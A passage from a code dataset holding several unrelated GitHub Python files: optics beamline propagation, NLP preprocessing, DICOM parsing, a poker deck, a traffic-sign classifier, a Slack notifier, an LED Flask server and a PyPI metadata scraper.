self._beamline_elements.append(beamline_element)\n self._propagator_handlers.append(propagator_handler)\n self._propagator_specific_parameteres.append(propagator_specific_parameters)\n\n\n def number_of_elements(self):\n return len(self._beamline_elements)\n\n def _initialize_propagator(self):\n\n self._propagator = PropagationManager.Instance()\n try:\n self._propagator.add_propagator(FresnelZoomXY2D())\n except:\n print(\"May be you alreay initialized propagator and stored FresnelZoomXY2D\")\n\n def _info(self):\n\n for i in range(self.number_of_elements()):\n print(\">>>\",self._beamline_elements[i])\n\n def propagate(self,wofry_wavefront):\n\n w_out = wofry_wavefront.duplicate()\n output_wavefronts = []\n\n for i in range(self.number_of_elements()):\n w_in = w_out.duplicate()\n\n #\n # propagating\n #\n #\n propagation_elements = PropagationElements()\n propagation_elements.add_beamline_element(self._beamline_elements[i])\n\n propagation_parameters = PropagationParameters(wavefront=w_in,propagation_elements = propagation_elements)\n\n propagation_parameters.set_additional_parameters('shift_half_pixel',(self._propagator_specific_parameteres[i])[\"shift_half_pixel\"])\n propagation_parameters.set_additional_parameters('magnification_x', (self._propagator_specific_parameteres[i])[\"magnification_x\"])\n propagation_parameters.set_additional_parameters('magnification_y', (self._propagator_specific_parameteres[i])[\"magnification_y\"])\n\n w_out = self._propagator.do_propagation(propagation_parameters=propagation_parameters,\n handler_name=self._propagator_handlers[i])\n\n output_wavefronts.append(w_out)\n\n\n\n return output_wavefronts\n\n\ndef create_wofry_wavefront(af,index,weight_with_eigenvalue=True):\n\n from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D\n\n z_array = af.mode(index)\n\n if weight_with_eigenvalue:\n z_array *= numpy.sqrt( (af.eigenvalue(index).real ))\n\n wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=af.x_coordinates(),\n y_array=af.y_coordinates(),\n z_array=z_array,\n )\n\n wavefront.set_photon_energy(af.photon_energy())\n\n return wavefront\n\ndef create_wofry_elements(slit_width=5e-6,slit_height=5e-6):\n\n # first screen\n beamline_element1 = BeamlineElement(\n optical_element=WOScreen(),\n coordinates=ElementCoordinates(p=36.0,q=0))\n\n # lens\n beamline_element2 = BeamlineElement(\n optical_element=WOIdealLens(name='',focal_x=18.000000,focal_y=18.000000),\n coordinates=ElementCoordinates(p=0,q=0))\n\n # slit\n\n\n boundary_shape = Rectangle(x_left=-0.5*slit_width,x_right=0.5*slit_width,y_bottom=-0.5*slit_height,y_top=0.5*slit_height)\n beamline_element3 = BeamlineElement(\n optical_element=WOSlit(boundary_shape=boundary_shape),\n coordinates=ElementCoordinates(p=32,q=0))\n\n # screen\n beamline_element4 = BeamlineElement(\n optical_element=WOScreen(),\n coordinates=ElementCoordinates(p=2,q=0))\n\n {'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0}\n\n return [beamline_element1,beamline_element2,beamline_element3,beamline_element4],\\\n ['FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D','FRESNEL_ZOOM_XY_2D'],\\\n [{'shift_half_pixel':1,'magnification_x':8.0,'magnification_y':8.0},\n {'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0},\n {'shift_half_pixel':1,'magnification_x':0.5,'magnification_y':0.35},\n {'shift_half_pixel':1,'magnification_x':0.2,'magnification_y':0.2}]\n\n\nif __name__ == \"__main__\":\n\n\n filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cs_new_u18_2m_1h_s2.5.npz\" # OK EBS\n # filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cl_low_beta_u18_2m_1h_s6.5.npy\" # OK LB\n # filename = \"/scisoft/users/glass/Documents/sources/Orange-SRW/comsyl/calculations/cl_high_beta_u18_2m_1h_s2.0.npy\"\n\n #\n # load CSD\n #\n\n af = CompactAFReader.initialize_from_file(filename)\n x = af.x_coordinates()\n y = af.y_coordinates()\n cumulated_occupation = af.cumulated_occupation_array()\n occupation = af.occupation_array()\n\n intensity_full = af.total_intensity()\n\n # plot(numpy.arange(cumulated_occupation.size),cumulated_occupation)\n\n\n # customize beamline\n slit_width=5e-6\n slit_height=5e-6\n\n slitV = [30,25,20,15,10,5, 5]\n slitH = [25,25,20,15,10,10,5]\n\n\n\n #\n # loop\n #\n f = open(\"propagation.txt\",'w')\n f.close()\n\n for j in range(1): #len(slitV)):\n\n slit_width = slitH[j]*1e-6\n slit_height = slitV[j]*1e-6\n\n intensity_accumulated = 0.0\n intensity_accumulated2 = 0.0\n\n for i in range(3): #af.number_modes()):\n wofry_wavefront = create_wofry_wavefront(af,i,weight_with_eigenvalue=True)\n e,h,s = create_wofry_elements(slit_width=slit_width,slit_height=slit_height)\n\n # plot_image(wofry_wavefront.get_intensity(),1e6*wofry_wavefront.get_coordinate_x(),1e6*wofry_wavefront.get_coordinate_y(),\n # title=\"source\")\n\n\n BEAMLINE = None\n BEAMLINE = WofrySuperBeamline()\n\n for k in range(len(e)):\n BEAMLINE.add_element(beamline_element=e[k],propagator_handler=h[k],propagator_specific_parameters=s[k])\n\n # BEAMLINE._info()\n\n wf_list = BEAMLINE.propagate(wofry_wavefront)\n\n\n\n intensity_accumulated += wf_list[-1].get_integrated_intensity()\n\n # for ll in range(4):\n # plot_image(wf_list[ll].get_intensity(),1e6*wf_list[ll].get_coordinate_x(),1e6*wf_list[ll].get_coordinate_y(),\n # title=\"slit H:%d x V:%d ; mode %d propagated to final oe\"%(slitH[j],slitV[j],i)+\">>ll% d\"%ll)\n\n ratio = intensity_accumulated/intensity_full\n print(\"slit H:%d, V:%d, up to mode: %d intensity(full): %g intensity(cut): %g ratio: %g \"%(\n slitH[j],slitV[j],i,intensity_full,intensity_accumulated,ratio,))\n\n\n print(\"\\n\\n\\n\\n\\n\\n\")\n f = open(\"propagation.txt\",'a')\n f.write('\"%d x %d\" %f \\n'%(slitV[j],slitH[j],ratio))\n f.close\n","repo_name":"srio/shadow3-scripts","sub_path":"HIGHLIGHTS/propagation2.py","file_name":"propagation2.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23372972383","text":"# -------------------- for split-embedding feature -----------------------\nfrom util.preprocess import jsonl2Diclist, add_dic\nimport transformers\n\nclass SplitEmbedding:\n def __init__(self, entity_property_pair_list, tokenizer : transformers.AutoTokenizer,\n model : transformers.AutoModel):\n self.entity_property_list = entity_property_pair_list\n self.tokenizer = tokenizer\n\n # for entity_property_pair in entity_property_pair_list:\n # splited = entity_property_pair.split('#')\n # self.entity_list.append(splited[0])\n # self.property_list.append(splited[1])\n #\n # self.entity_list = list(set(self.entity_list))\n # self.property_list = list(set(self.property_list))\n #\n # tokenized_entity_list = self.tokenizer(self.entity_list, return_tensors='pt', padding=True)\n # hidden = model(tokenized_entity_list['input_ids'])\n # self.entity_embedding_dict={}\n # for n, entity in enumerate(self.entity_list):\n # self.entity_embedding_dict[entity] = hidden['last_hidden_state'][n, 0, :]\n\n tokenized_entity_property_list = self.tokenizer(self.property_list, return_tensors='pt', padding=True)\n hidden = model(tokenized_entity_property_list['input_ids'])\n self.entity_property_embedding_list={}\n for n, entity_property_pair in enumerate(self.entity_property_list):\n self.entity_property_embedding_list[entity_property_pair] = hidden['last_hidden_state'][n, 0, :]\n\n def make_ent_attr_data(self, sentence, entity_property_pair_list):\n # entity_embeddings_list = []\n # property_embeddings_list = []\n entity_property_embeddings_list=[]\n tokenized_sentence_list = self.tokenizer([sentence for _ in range(len(entity_property_pair_list))])\n\n for entity_property_pair in entity_property_pair_list:\n # entity = entity_property_pair.split('#')[0]\n # property = entity_property_pair.split('#')[1]\n # entity_embeddings_list.append(self.entity_embedding_dict[entity])\n # property_embeddings_list.append(self.property_embedding_dict[property])\n entity_property_embeddings_list.append(self.entity_property_embedding_list[entity_property_pair])\n\n res= {'input_ids': tokenized_sentence_list['input_ids'], 'attention_mask': tokenized_sentence_list['attention_mask'],\n 'entity_property_embeddings':entity_property_embeddings_list}\n # 'entity_embeddings':entity_embeddings_list, 'property_embeddings':property_embeddings_list}\n return res\n\n def label_and_make_ent_attr_data(self, sentence, annotation_list, entity_property_pair_list):\n tokenized_ent_attr_list = self.make_ent_attr_data(sentence, entity_property_pair_list)\n tokenized_ent_attr_list['label'] = [0 for _ in range(len(entity_property_pair_list))]\n for annotation in annotation_list:\n tokenized_ent_attr_list['label'][entity_property_pair_list.index(annotation[0])] = 1\n\n return tokenized_ent_attr_list\n\n def label_emotion(self, sentence, annotation_list, emotion_pair):\n # temp = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings': [], 'property_embeddings': []}\n temp = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_property_embeddings': []}\n for annot in annotation_list:\n ent_attr = annot[0]\n entity_property_embeddings = self.entity_property_embeddings_list[ent_attr]\n # entity = ent_attr.split('#')[0]\n # property = ent_attr.split('#')[1]\n # entity_embeddings = self.entity_embedding_dict[entity]\n # property_embeddings = self.property_embedding_dict[property]\n\n emotion = annot[2]\n tokenized = self.tokenizer(sentence)\n tokenized.data['label'] = emotion_pair[emotion]\n\n temp['input_ids'].append(tokenized.data['input_ids'])\n temp['attention_mask'].append(tokenized.data['attention_mask'])\n temp['label'].append(tokenized.data['label'])\n temp['entity_property_embeddings'].append(entity_property_embeddings)\n # temp['entity_embeddings'].append(entity_embeddings)\n # temp['property_embeddings'].append(property_embeddings)\n return temp\n\n def preprocess_ent_attr_splitembedding(self, train_filepath, dev_filepath, entity_property_pair_list):\n train_dic = jsonl2Diclist(train_filepath)\n dev_dic = jsonl2Diclist(dev_filepath)\n # train_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_embeddings':[], 'property_embeddings':[]}\n # dev_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_embeddings':[], 'property_embeddings':[]}\n train_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n dev_ent_attr_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n\n print('labeling data...')\n from tqdm import tqdm\n for data in tqdm(train_dic):\n temp_data = self.label_and_make_ent_attr_data(data['sentence_form'], data['annotation'], entity_property_pair_list)\n train_ent_attr_data = add_dic(train_ent_attr_data, temp_data)\n for data in tqdm(dev_dic):\n temp_data = self.label_and_make_ent_attr_data(data['sentence_form'], data['annotation'], entity_property_pair_list)\n dev_ent_attr_data = add_dic(dev_ent_attr_data, temp_data)\n\n return train_ent_attr_data, dev_ent_attr_data\n\n def preprocess_emotion_splitembedding(self, train_filepath, dev_filepath, emotion_pair):\n dev_dic = jsonl2Diclist(dev_filepath)\n train_dic = jsonl2Diclist(train_filepath)\n # train_emotion_data = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings':[], 'property_embeddings':[]}\n # dev_emotion_data = {'input_ids': [], 'attention_mask': [], 'label': [], 'entity_embeddings':[], 'property_embeddings':[]}\n train_emotion_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n dev_emotion_data = {'input_ids':[], 'attention_mask':[],'label':[], 'entity_property_embeddings': []}\n\n for data in train_dic:\n temp_data = self.label_emotion(data['sentence_form'], data['annotation'], emotion_pair)\n train_emotion_data = add_dic(train_emotion_data, temp_data)\n for data in dev_dic:\n temp_data = self.label_emotion(data['sentence_form'], data['annotation'], emotion_pair)\n dev_emotion_data = add_dic(dev_emotion_data, temp_data)\n\n return train_emotion_data, dev_emotion_data","repo_name":"comchobo/team-ganadara-public","sub_path":"SplitEmbedding/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24921433377","text":"from typing import cast, List\nimport sys\n\nfrom dicom_standard import parse_lib as pl\nfrom dicom_standard.macro_utils import MetadataTableType\nfrom dicom_standard.preprocess_modules_with_attributes import (\n key_tables_by_id,\n expand_all_macros,\n preprocess_attribute_fields,\n expand_hierarchy,\n)\n\n\nif __name__ == '__main__':\n module_macro_attr_tables = cast(List[MetadataTableType], pl.read_json_data(sys.argv[1]))\n id_to_table = key_tables_by_id(module_macro_attr_tables)\n macro_attr_tables = [table for table in module_macro_attr_tables if table['isMacro']]\n expanded_tables = expand_all_macros(macro_attr_tables, id_to_table)\n preprocessed_tables = preprocess_attribute_fields(expanded_tables)\n tables_with_hierarchy = expand_hierarchy(preprocessed_tables)\n pl.write_pretty_json(tables_with_hierarchy)\n","repo_name":"innolitics/dicom-standard","sub_path":"dicom_standard/preprocess_macros_with_attributes.py","file_name":"preprocess_macros_with_attributes.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"40"} +{"seq_id":"7833716793","text":"from constantes import PALOS, FIGURAS\nfrom carta import Carta\nimport random\nfrom mensajes import Mensajes\n\nmensajes = Mensajes()\n\nclass Baraja:\n\n def __init__(self):\n # Inicializamos una baraja sin cartas\n self.cartas = []\n self.crear_cartas_baraja()\n \n def crear_cartas_baraja(self):\n \"\"\"\n La baraja en el poker tiene 52 cartas. \n 13 cartas por cada palo\n \"\"\"\n for palo in PALOS:\n for cada_figura in FIGURAS:\n carta = Carta(palo=palo, figura=cada_figura) \n self.cartas.append(carta) \n \n def mostrar_cartas(self):\n for carta in self.cartas:\n carta.mostrar_carta()\n\n def barajar(self):\n random.shuffle(self.cartas)\n\n def ordenar_cartas(self):\n self.cartas.sort()\n \n def buscar_carta(self, carta):\n for cada_carta in self.cartas:\n if (carta.palo == cada_carta.palo and carta.figura == cada_carta.figura):\n return cada_carta\n else:\n mensajes.error(\"La carta buscada no esta en la baraja [{},{}]\".format(carta.palo, str(carta.figura)))\n return None\n\n def eliminar_carta_de_baraja(self, carta):\n carta_eliminada = None\n for indice, cada_carta in enumerate(self.cartas):\n if (cada_carta.palo == carta.palo and cada_carta.figura == carta.figura):\n carta_eliminada = self.cartas.pop(indice)\n return carta_eliminada\n\n def get_numero_de_cartas(self):\n return len(self.cartas)\n\n\n\nif __name__ ==\"__main__\":\n baraja = Baraja()\n baraja.barajar()\n baraja.mostrar_cartas()\n","repo_name":"spuzi/holdem","sub_path":"main/baraja.py","file_name":"baraja.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15620747466","text":"import numpy as np \nfrom tensorflow import keras\nfrom PIL import Image\nfrom flask import Flask, json\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, array_to_img, load_img\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.applications import VGG19\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, Dense, Flatten, Dropout\n\nfrom gtts import gTTS\nimport gradio as gr\nfrom playsound import playsound\n\nbatch_size = 1\nseed = 42\n\nclasses = { 0:'Speed limit (20km/h)',\n 1:'Speed limit (30km/h)', \n 2:'Speed limit (50km/h)', \n 3:'Speed limit (60km/h)', \n 4:'Speed limit (70km/h)', \n 5:'Speed limit (80km/h)', \n 6:'End of speed limit (80km/h)', \n 7:'Speed limit (100km/h)', \n 8:'Speed limit (120km/h)', \n 9:'No passing', \n 10:'No passing veh over 3.5 tons', \n 11:'Right-of-way at intersection', \n 12:'Priority road', \n 13:'Yield', \n 14:'Stop', \n 15:'No vehicles', \n 16:'Veh > 3.5 tons prohibited', \n 17:'No entry', \n 18:'General caution', \n 19:'Dangerous curve left', \n 20:'Dangerous curve right', \n 21:'Double curve', \n 22:'Bumpy road', \n 23:'Slippery road', \n 24:'Road narrows on the right', \n 25:'Road work', \n 26:'Traffic signals', \n 27:'Pedestrians', \n 28:'Children crossing', \n 29:'Bicycles crossing', \n 30:'Beware of ice/snow',\n 31:'Wild animals crossing', \n 32:'End speed + passing limits', \n 33:'Turn right ahead', \n 34:'Turn left ahead', \n 35:'Ahead only', \n 36:'Go straight or right', \n 37:'Go straight or left', \n 38:'Keep right', \n 39:'Keep left', \n 40:'Roundabout mandatory', \n 41:'End of no passing', \n 42:'End no passing veh > 3.5 tons' }\nheight = 50\nwidth = 50\nbatch_size = 150\n\nmodel = keras.models.Sequential([ \n keras.layers.Conv2D(filters=16, kernel_size=(5,5), activation='relu', input_shape=(50,50,3)),\n keras.layers.Conv2D(filters=32, kernel_size=(5,5), activation='relu'),\n keras.layers.MaxPool2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(axis=-1),\n \n keras.layers.Conv2D(filters=64, kernel_size=(3,3), activation='relu'),\n keras.layers.Conv2D(filters=64, kernel_size=(3,3), activation='relu'),\n keras.layers.MaxPool2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(axis=-1),\n keras.layers.Dropout(rate=0.25),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation='relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.25),\n \n keras.layers.Dense(43, activation='softmax')\n])\n\nmodel = keras.models.load_model(filepath=r'models/CNN.h5')\n#model = keras.models.load_model(filepath='CNN.h5')\n\ndef pred(image):\n image_numpy = np.array(image.resize((50,50))) / 255\n image_numpy = np.expand_dims(image_numpy, axis=0)\n\n predicted = model.predict(image_numpy)\n namesign = classes[np.argmax(predicted, axis=-1)[0]]\n print(namesign)\n\n filename = 'speech.wav'\n tts = gTTS(namesign)\n tts.save(filename)\n #display(Audio(filename, autoplay=True))\n playsound(filename)\n return namesign\n\n\n\napi = Flask(__name__)\n\n@api.route('/', methods=['GET'])\ndef signToText():\n image = Image.open('test.jpg')\n res = pred(image)\n print(res)\n return\n\n# Path: main.py\nif __name__ == '__main__':\n print('Start')\n gr.Interface(fn=pred, \n inputs=gr.Image(type=\"pil\"),\n outputs=gr.Label(num_top_classes=3),\n examples=[]).launch(debug=True)\n #api.run()","repo_name":"ZeANi-SHILIX/BiGeN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43094597099","text":"from shepherd.notifier import Notifier\nfrom shepherd.event import Event\nfrom slacker import Slacker\n\nclass Slack(Notifier):\n def __init__(self, *args, **kwargs):\n super(Slack, self).__init__(*args, **kwargs)\n self.token = self.config.SLACK_TOKEN\n self.channel = self.config.SLACK_CHANNEL\n self.slack = Slacker(self.token)\n\n def notify(self, event:Event):\n try:\n attachments = self._create_attachments(event)\n response = self.slack.chat.post_message(self.channel, '',\n as_user=True, attachments=attachments)\n if response.body['ok']:\n self.log.debug(\"Notification sent to %s\" % self.channel)\n else:\n self.log.error(response.body)\n raise Exception(\"Failed to send notification to %s\" % self.channel)\n except Exception as e:\n import traceback\n self.log.error(traceback.format_exc())\n self.log.error(e)\n\n def _create_fields(self, event:Event):\n meta = event.meta()\n fields = []\n for key in meta.keys():\n val = meta[key]\n fields += [{\n \"title\": key.title(),\n \"value\": \"`%s`\" % val,\n \"short\": True\n }]\n\n return fields\n\n def _create_attachments(self, event:Event):\n return [{\n \"fallback\": event.description(),\n \"color\": event.severity(),\n \"author_name\": self.config.SLACK_AUTHOR_NAME,\n \"author_icon\": self.config.SLACK_AUTHOR_ICON,\n \"text\": event.summary(),\n \"footer\": self.config.SLACK_FOOTER,\n \"footer_icon\": self.config.SLACK_FOOTER_ICON,\n \"mrkdwn_in\": [\"text\", \"fields\"],\n \"fields\": self._create_fields(event)\n }]\n","repo_name":"coralhq/shepherd","sub_path":"src/shepherd/notifier/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1786706926","text":"from flask import Flask, jsonify, request\nfrom pixel_strip import createStrip\nfrom led import imageLoop, drawData, runDemo, updatePixel\nfrom render import motion\nfrom pixel_rain import start_rain, end_rain\n\n\napplication = Flask(__name__, static_folder='script')\napplication.config['SECRET_KEY'] = 'top-secret!'\n\nSTRIP = createStrip()\n\n# Response Dict\ndef request_ok(response_dict, success=True):\n response_dict.update({\n 'success': success\n })\n resp = jsonify(**response_dict)\n resp.status_code = 200\n return resp\n\n@application.route('/image_cycle', methods=['GET', 'POST'])\ndef image_cycle():\n imageLoop(STRIP)\n return request_ok({ 'message': 'Started Displaying Images.'})\n\n\n\n@application.route('/set_pixel_box', methods=['POST'])\ndef set_pixel_box():\n json = request.get_json()\n img_data = None if 'img_data' not in json else json['img_data']\n drawData(STRIP,img_data)\n return request_ok({ 'message': 'Image Set'})\n\n@application.route('/pixel_update', methods=['POST'])\ndef pixel_update():\n json = request.get_json()\n img_data = None if 'img_data' not in json else json['img_data']\n updatePixel(STRIP,img_data)\n return request_ok({ 'message': 'Pixel Updated'})\n\n# Status Checkin\n\n\n# Rain\n@application.route('/rain_start', methods=['GET', 'POST'])\ndef rain_start():\n start_rain(STRIP)\n return request_ok({ 'message': 'Rain Complete'})\n\n@application.route('/rain_stop', methods=['GET', 'POST'])\ndef rain_stop():\n end_rain()\n return request_ok({ 'message': 'Rain Stopped.'})\n\n@application.route('/rain_toggle', methods=['GET', 'POST'])\ndef rain_stop():\n end_rain()\n return request_ok({ 'message': 'Rain Stopped.'})\n\n\n\n\n@application.route('/ping', methods=['GET', 'POST'])\ndef ping():\n return request_ok({ 'message': 'P0NG!'})\n\n@application.route('/test', methods=['GET', 'POST'])\ndef test():\n motion(STRIP)\n return request_ok({ 'message': 'Welcome to Amiblight\\'s moblie API.'})\n \nif __name__ == '__main__':\n application.run(debug=True,use_reloader=True, host='0.0.0.0', port=8080)\n","repo_name":"jmade/PixelBox-Server","sub_path":"pixelbox.py","file_name":"pixelbox.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14379124321","text":"from __future__ import annotations\nimport contextlib\nimport itertools\nimport json\nimport os\nimport re\nimport sqlite3\nimport subprocess\nimport tempfile\nimport threading\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom contextlib import closing\n\nimport psl\nimport urllib3\nfrom packaging.version import InvalidVersion, Version\nfrom tqdm import tqdm\nfrom urllib3.util import parse_url\nfrom wheel_filename import InvalidFilenameError, parse_wheel_filename\n\n# logger = logging.getLogger()\n# logger.setLevel(logging.DEBUG)\n# logger.addHandler(logging.StreamHandler())\n\nMAX_WORKERS = 16\nGOOGLE_ASSURED_OSS_PACKAGES = set()\nDOWNLOADS_URL = \"https://raw.githubusercontent.com/hugovk/top-pypi-packages/main/top-pypi-packages-30-days.min.json\"\n\n@contextlib.contextmanager\ndef locked_db():\n with db_lock:\n yield _DB\n _DB.commit()\n\n\ndef get_all_package_names():\n resp = http.request(\"GET\", \"https://pypi.org/simple\")\n return sorted(\n [item.decode() for item in re.findall(b'href=\"/simple/([^/]+)/', resp.data)]\n )\n\n\ndef get_extras(req):\n return tuple(sorted(set(re.findall(r\"extra=='([^']+)'\", req))))\n\n\ndef dist_from_requires_dist(req):\n return re.match(r\"^([A-Za-z0-9_.\\-]+)\", req).group(1)\n\n\ndef specifier_from_requires_dist(req):\n return re.sub(r\"\\(([^)]+)\\)\", r\"\\1\", req, 1)\n\n\ndef normalize_requires_dist(req):\n return re.sub(\n r\"\\s*,\\s*\",\n \",\",\n re.sub(\n r\"\\s*([!><=~]{1,2})\\s*\",\n r\"\\1\",\n re.sub(r\"\\s*;\\s*\", r\"; \", req.replace('\"', \"'\")),\n ),\n ).lower()\n\n\ndef requires_dist_sort_key(req):\n return (\n get_extras(req),\n re.match(r\"^([a-zA-Z0-9_.\\-\\[\\]]+)\", req).group(1).lower(),\n req,\n )\n\n\ndef to_versions(items):\n vers = []\n for item in items:\n try:\n vers.append(Version(item))\n except InvalidVersion:\n continue\n return vers\n\n\ndef sorted_versions(items):\n vers = []\n for item in items:\n try:\n vers.append((Version(item), item))\n except InvalidVersion:\n continue\n return [\n x\n for _, x in sorted(\n vers,\n )\n ]\n\n\ndef get_metadata_by_install(package, resp):\n if (\n os.system(\n f\"{venv_python} -m pip install --disable-pip-version-check {package} importlib-metadata > /dev/null\"\n )\n != 0\n ):\n return None\n\n print(f\"building {package!r} from source!\")\n popen = subprocess.Popen(\n f\"{venv_python} -c 'import json; from importlib_metadata import Distribution; \"\n f'd=Distribution.from_name(\"{package}\"); print(json.dumps({{\"requires_dist\": d.requires(package), \"requires_python\": d.metadata.get(\"Requires-Python\", \"\"), \"wheel_data\": dist.read_text(\"WHEEL\") or \"\"}}))\\'',\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL,\n )\n\n # Run the install for no more than 20 seconds\n start_time = time.time()\n while time.time() - start_time < 20 and popen.poll() is None:\n time.sleep(0.5)\n\n if popen.returncode != 0:\n return resp\n package_metadata = json.loads(popen.stdout.read())\n\n resp = resp.copy()\n resp[\"info\"][\"requires_dist\"] = package_metadata[\"requires_dist\"]\n resp[\"info\"][\"requires_python\"] = package_metadata[\"requires_python\"]\n return resp\n\n\ndef get_maintainers_from_pypi(package: str):\n for _ in range(5):\n resp = http.request(\"GET\", f\"https://pypi.org/project/{package}/\")\n if resp.status == 404:\n return set()\n elif resp.status != 200:\n continue\n return set(\n re.findall(\n r\" check_score:\n continue\n\n checks[check_name] = check_score\n\n checks[\"Overall\"] = scorecard[\"score\"]\n break\n\n except (KeyError, IndexError):\n return {}\n return checks\n\n\ndef get_project_urls(info: dict) -> list[tuple[str, str, str]]:\n names_urls = [\n (\"docs_url\", info.get(\"docs_url\")),\n (\"Downloads\", info.get(\"download_url\")),\n (\"Homepage\", info.get(\"home_page\")),\n ]\n\n if info.get(\"project_urls\"):\n for name, url in info.get(\"project_urls\").items() or ():\n names_urls.append((name, url))\n\n names_urls_hosts = []\n for project_name, project_url in names_urls:\n parsed = parse_project_url(project_url)\n if not parsed:\n continue\n host = psl.domain_suffixes(parsed.host).private\n names_urls_hosts.append((project_name, str(parsed), host))\n\n return names_urls_hosts\n\n\ndef update_data_for_package(package: str) -> None:\n global downloads, db_lock, GOOGLE_ASSURED_OSS_PACKAGES\n\n resp = http.request(\"GET\", f\"https://pypi.org/pypi/{package}/json\")\n\n if resp.status != 200:\n return\n try:\n resp = json.loads(resp.data.decode(\"utf-8\"))\n except Exception:\n return\n try:\n version = Version(resp[\"info\"][\"version\"])\n except InvalidVersion: # The latest release has an invalid version, skip\n return\n latest_version = max(to_versions(resp[\"releases\"].keys()))\n\n # Favor pre-releases over non-pre-releases\n if version < latest_version:\n new_resp = http.request(\n \"GET\", f\"https://pypi.org/pypi/{package}/{latest_version}/json\"\n )\n if new_resp.status != 200:\n version = latest_version\n\n # Get the exact string for the version that we found\n for strv in resp.get(\"releases\", ()):\n try:\n if Version(strv) == version:\n str_version = strv\n break\n except InvalidVersion:\n continue\n else:\n # Skip this package\n return\n\n scorecard_checks = fetch_checks_for_package(package)\n scorecard_overall = scorecard_checks.pop(\"Overall\", None)\n\n maintainers = get_maintainers_from_pypi(package)\n\n requires_python = resp[\"info\"][\"requires_python\"] or \"\"\n urequires_dist = [\n normalize_requires_dist(x) for x in resp[\"info\"][\"requires_dist\"] or []\n ]\n urequires_dist = sorted(urequires_dist, key=requires_dist_sort_key)\n\n requires_dist = {\"specifiers\": [], \"dists\": []}\n requires_extras = {}\n yanked = []\n\n releases = resp[\"releases\"][str_version]\n first_uploaded_at = None if not releases else min(x[\"upload_time\"] for x in releases)\n last_uploaded_at = None if not releases else max(x[\"upload_time\"] for x in releases)\n wheel_data = [\n (x[\"filename\"], x[\"url\"], x[\"upload_time\"]) for x in releases if x[\"filename\"].endswith(\".whl\")\n ]\n has_binary_wheel = False\n\n for filename, _, uploaded_at in wheel_data:\n try:\n whl = parse_wheel_filename(filename)\n except InvalidFilenameError:\n continue\n python_tags, abi_tags, platform_tags = (\n whl.python_tags,\n whl.abi_tags,\n whl.platform_tags,\n )\n for wheel_data in itertools.product(python_tags, abi_tags, platform_tags):\n py, abi, plat = wheel_data\n with locked_db() as db:\n db.execute(\n \"\"\"\n INSERT INTO wheels (\n package_name, filename, build, python, abi, platform, uploaded_at\n ) VALUES (?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n (package, filename, whl.build, py, abi, plat, uploaded_at),\n )\n\n if abi_tags == [\"none\"] and platform_tags == [\"any\"]:\n continue\n\n has_binary_wheel = True\n\n # Check if the package has any known vulnerabilities.\n has_vulnerabilities = bool(resp.get(\"vulnerabilities\", []))\n\n package_downloads = downloads.get(package, 0)\n with locked_db() as db:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO packages (\n name, version, requires_python, has_binary_wheel, has_vulnerabilities, first_uploaded_at, last_uploaded_at, downloads, scorecard_overall, in_google_assured_oss\n ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n (\n package,\n str_version,\n requires_python,\n has_binary_wheel,\n has_vulnerabilities,\n first_uploaded_at,\n last_uploaded_at,\n package_downloads,\n scorecard_overall,\n package.lower() in GOOGLE_ASSURED_OSS_PACKAGES\n ),\n )\n\n project_urls = get_project_urls(resp[\"info\"])\n\n for name, url, host in project_urls:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO package_urls (package_name, name, url, public_suffix) VALUES (?, ?, ?, ?);\n \"\"\",\n (package, name, url, host),\n )\n\n for maintainer in maintainers:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO maintainers (name, package_name) VALUES (?, ?);\n \"\"\",\n (maintainer, package),\n )\n\n for req in urequires_dist:\n extras = get_extras(req)\n req_no_specifiers = dist_from_requires_dist(req)\n specifier = 